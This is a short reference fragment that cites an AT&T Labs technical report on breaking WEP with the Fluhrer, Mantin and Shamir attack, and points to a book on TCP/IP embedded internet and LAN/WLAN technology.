A. Stubblefield, J. Ioannidis and A. D. Rubin, "Using the Fluhrer, Mantin, and Shamir Attack to Break WEP", AT&T Labs Technical Report TD-4ZCPZZ, August 2001.
Eddie Insam's book TCP/IP Embedded Internet Applications (published August 2003 by Newnes) gives more information about LAN and WLAN technology and principles.